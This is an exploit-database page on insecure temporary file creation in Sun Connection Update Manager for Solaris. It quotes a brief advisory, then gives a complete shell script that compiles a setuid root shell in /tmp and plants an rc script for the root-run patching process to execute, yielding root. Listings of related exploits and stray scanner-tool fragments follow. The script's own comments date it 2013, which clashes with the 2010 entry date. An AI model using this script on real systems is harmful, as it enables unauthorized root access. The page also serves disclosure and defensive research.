Menu

Search for hundreds of thousands of exploits

"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities"

Author

Exploit author

"Larry W. Cashdollar"

Platform

Exploit platform

solaris

Release date

Exploit published date

2010-03-24

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
source: https://www.securityfocus.com/bid/38928/info

Sun Connection Update Manager for Solaris creates temporary files in an insecure manner.

An attacker with local access could potentially exploit these issues to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application.

Successfully mounting a symlink attack may allow the attacker to overwrite or corrupt sensitive files, which may result in a denial-of-service or privilege escalation. Other attacks may also be possible.

These issues affect unknown versions of the application. In addition, these issues may affect certain Solaris patch clusters or individual patch releases.

#!/bin/sh
#Larry W. Cashdollar, local root for Solaris x86 during patching
#10/4/2013 Tested on Cluster 9/30/2013
# larry@s0l4r1s:~$ ./disk_exp.sh 
# [+] Creating evil shell
# [+] Hope you've got gcc on here, compiling...
# [+] Waiting for root shell
# [+] Tada!
# # id
# uid=0(root) gid=0(root)


echo "[+] Creating evil shell"

cat << EOF > r00t.c
#include <stdio.h>
#include <unistd.h>
int
main (void)
{
  char *shell[2];
  shell[0] = "sh";
  shell[1] = NULL;
  setreuid (0, 0);
  setregid (0, 0);
  execve ("/bin/sh", shell, NULL);
  return(0);
}
EOF

echo "[+] Hope you've got gcc on here, compiling..."

gcc r00t.c -o /tmp/r00t

mkdir -p /tmp/diskette_rc.d/

echo "#!/bin/sh" > /tmp/diskette_rc.d/rcs9.sh
echo "chown root:root /tmp/r00t" >> /tmp/diskette_rc.d/rcs9.sh
echo "chmod +s /tmp/r00t" >> /tmp/diskette_rc.d/rcs9.sh
chmod +x /tmp/diskette_rc.d/rcs9.sh
echo "[+] Waiting for root shell"

until [  -u /tmp/r00t ]; do sleep 1; done; echo "[+] Tada!";/tmp/r00t
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-04-21 "Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation" local solaris "Marco Ivaldi"
2019-10-21 "Solaris 11.4 - xscreensaver Privilege Escalation" local solaris "Marco Ivaldi"
2019-10-16 "Solaris xscreensaver 11.4 - Privilege Escalation" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)" local solaris "Marco Ivaldi"
2019-01-14 "xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)" local solaris "Marco Ivaldi"
2018-10-16 "Solaris - RSH Stack Clash Privilege Escalation (Metasploit)" local solaris Metasploit
2018-09-25 "Solaris - 'EXTREMEPARR' dtappgather Privilege Escalation (Metasploit)" local solaris Metasploit
2018-09-18 "Solaris - libnspr NSPR_LOG_FILE Privilege Escalation (Metasploit)" local solaris Metasploit
Release Date Title Type Platform Author
2019-01-16 "Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit" webapps php "Larry W. Cashdollar"
2018-10-11 "jQuery-File-Upload 9.22.0 - Arbitrary File Upload" webapps php "Larry W. Cashdollar"
2018-09-18 "WordPress Plugin Arigato Autoresponder and Newsletter 2.5 - Blind SQL Injection / Reflected Cross-Site Scripting" webapps php "Larry W. Cashdollar"
2018-04-23 "Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure" webapps php "Larry W. Cashdollar"
2017-08-31 "Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection" webapps php "Larry W. Cashdollar"
2017-08-31 "Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection" webapps php "Larry W. Cashdollar"
2017-08-31 "Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection" webapps php "Larry W. Cashdollar"
2016-09-22 "Joomla! Component com_videogallerylite 1.0.9 - SQL Injection" webapps php "Larry W. Cashdollar"
2016-09-16 "Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection" webapps php "Larry W. Cashdollar"
2016-09-16 "Joomla! Component Catalog 1.0.7 - SQL Injection" webapps php "Larry W. Cashdollar"
2015-12-30 "DeleGate 9.9.13 - Local Privilege Escalation" local linux "Larry W. Cashdollar"
2015-08-10 "WordPress Plugin Candidate Application Form 1.0 - Arbitrary File Download" webapps php "Larry W. Cashdollar"
2015-08-10 "WordPress Plugin Simple Image Manipulator 1.0 - Arbitrary File Download" webapps php "Larry W. Cashdollar"
2015-08-10 "WordPress Plugin Recent Backups 0.7 - Arbitrary File Download" webapps php "Larry W. Cashdollar"
2015-08-10 "WordPress Plugin WPTF Image Gallery 1.03 - Arbitrary File Download" webapps php "Larry W. Cashdollar"
2015-07-13 "WordPress Plugin Swim Team 1.44.10777 - Arbitrary File Download" webapps php "Larry W. Cashdollar"
2015-07-08 "WordPress Plugin Easy2Map 1.24 - SQL Injection" webapps php "Larry W. Cashdollar"
2015-07-08 "WordPress Plugin WP E-Commerce Shop Styling 2.5 - Arbitrary File Download" webapps php "Larry W. Cashdollar"
2015-06-12 "WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal" webapps php "Larry W. Cashdollar"
2015-06-12 "WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload" webapps php "Larry W. Cashdollar"
2015-04-02 "WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload" webapps php "Larry W. Cashdollar"
2015-04-02 "WordPress Plugin VideoWhisper Video Presentation 3.31.17 - Arbitrary File Upload" webapps php "Larry W. Cashdollar"
2014-11-10 "WordPress Plugin / Joomla! Component XCloner - Multiple Vulnerabilities" webapps php "Larry W. Cashdollar"
2013-07-09 "Solaris Recommended Patch Cluster 6/19 (x86) - Local Privilege Escalation" local linux_x86 "Larry W. Cashdollar"
2013-03-12 "RubyGems fastreader - 'entry_controller.rb' Remote Command Execution" remote multiple "Larry W. Cashdollar"
2013-02-05 "Oracle Automated Service Manager 1.3 - Installation Privilege Escalation" local linux "Larry W. Cashdollar"
2012-12-09 "Centrify Deployment Manager 2.1.0.283 - Local Privilege Escalation" local linux "Larry W. Cashdollar"
2010-03-24 "Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities" local solaris "Larry W. Cashdollar"
2003-07-01 "InterSystems Cache 4.1.15/5.0.x - Insecure Default Permissions" local linux "Larry W. Cashdollar"
2003-04-23 "SAP Database 7.3/7.4 - SDBINST Race Condition" local linux "Larry W. Cashdollar" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected